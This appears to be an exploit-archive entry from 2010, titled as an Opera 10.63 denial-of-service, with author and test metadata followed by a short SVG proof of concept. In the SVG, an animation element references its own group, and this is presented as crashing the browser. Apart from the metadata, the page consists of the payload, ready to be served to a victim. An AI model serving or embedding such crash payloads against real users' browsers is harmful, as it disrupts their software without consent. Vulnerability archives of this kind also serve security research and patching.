[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Opera v10.63 SVG animation Element Denial of Service
# Published : 2010-10-17
# Author : fla
# Previous Title : ALPHA Player 2.4 Denial of Service Vulnerability
# Next Title : Novel eDirectory DHost Console 8.8 SP3 Local SEH Overwrite


# Exploit Title: Opera Denial of Service by SVG <animation> Element
# Date: 16, October 2010
# Author:  fla
# Software Link: http://www.opera.com/
# Version: 10.63 and previous
# Tested on: Ubuntu 10.10 x64, Windows 7 x64

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" >
<g id="animTest" ></g> 
<animation xlink:href="#animTest" />
</svg>